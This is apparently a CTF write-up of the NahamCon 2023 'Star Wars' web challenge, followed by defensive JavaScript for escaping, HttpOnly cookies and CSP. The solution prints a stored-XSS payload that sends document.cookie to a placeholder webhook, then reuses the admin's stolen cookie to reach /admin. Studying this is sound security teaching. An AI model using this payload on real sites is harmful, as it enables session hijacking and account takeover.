teebow1e's CTF write-ups · 2023 · NahamCon CTF
Star Wars

Typical XSS challenge.


Last updated 1 year ago

Description

Author: @congon4tor#2334

If you love Star Wars as much as I do you need to check out this blog!

Solution

On visiting the site, we were welcomed with a login and signup prompt. Trying some SQLi and SSTI payloads there didn't work.

We have a site with posts (and comments too!).

Since each post is numbered, I also tried some IDOR tricks, but it turned out that there are no hidden posts.

When commenting, I received this notification:

Great! Someone is reading my comment, which is a perfect sign of XSS. Let's fire up webhooks and my favourite XSS payload:

```html
<script>document.location="WEBHOOKS_URL/?q="+document.cookie</script>
```

And we got the admin's cookie:

Using this cookie to log in, we are admin now and we can get the flag at the /admin endpoint.
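The bug behind this challenge is a stored XSS: the comment body is written into the page unescaped, the admin bot renders it, and the session cookie is readable from `document.cookie`. The following is an added example of the defensive side, written for this write-up and not code from the challenge or its author. It shows the raw interpolation that makes the payload above work next to an escaped renderer, a session cookie issued with `HttpOnly` (which would have left the payload exfiltrating an empty string), and a simple markup check a comment endpoint could alert on. The function names, the CSP string and the placeholder `WEBHOOKS_URL` are assumptions.

```javascript
// Added example (not from the write-up): defending against the stored XSS above.

// Constructed sample: the write-up's payload with its placeholder URL kept.
const SAMPLE_COMMENT =
  '<script>document.location="WEBHOOKS_URL/?q="+document.cookie</script>';

// Vulnerable rendering: the comment text is interpolated straight into HTML,
// so a <script> tag in a comment runs in every reader's browser (admin bot included).
function renderCommentUnsafe(text) {
  return `<div class="comment">${text}</div>`;
}

// Escape the characters that change meaning in an HTML text context.
function escapeHtml(text) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(text).replace(/[&<>"']/g, (c) => map[c]);
}

// Fixed rendering: the same comment arrives as inert text.
function renderCommentSafe(text) {
  return `<div class="comment">${escapeHtml(text)}</div>`;
}

// True if the rendered HTML still carries a live <script> tag.
function hasScriptTag(html) {
  return /<script\b/i.test(html);
}

// Session cookie attributes (assumed names). HttpOnly removes the cookie from
// document.cookie, so even a successful script injection cannot read it.
function buildSessionCookie(value) {
  return `session=${encodeURIComponent(value)}; Path=/; HttpOnly; Secure; SameSite=Lax`;
}

// Defence in depth (assumed policy): a CSP without 'unsafe-inline' blocks the
// inline <script> in the payload even if escaping is ever missed.
const CSP_HEADER = "default-src 'self'; script-src 'self'";

// Cheap pre-storage heuristic for logging/alerting on comments that look like
// markup. Escaping on output is the real fix; this only surfaces attempts.
function looksLikeMarkup(text) {
  return /<[a-z!/]/i.test(text);
}

// Stand-alone demo.
console.log("unsafe :", renderCommentUnsafe(SAMPLE_COMMENT));
console.log("safe   :", renderCommentSafe(SAMPLE_COMMENT));
console.log("cookie :", buildSessionCookie("example-session-id"));
console.log("CSP    :", CSP_HEADER);
console.log("flagged:", looksLikeMarkup(SAMPLE_COMMENT));
```

Escaping belongs at the point where the text meets HTML, not on input; the `looksLikeMarkup` check is only useful as a detection signal, since legitimate comments about Star Wars may well contain a stray `<`.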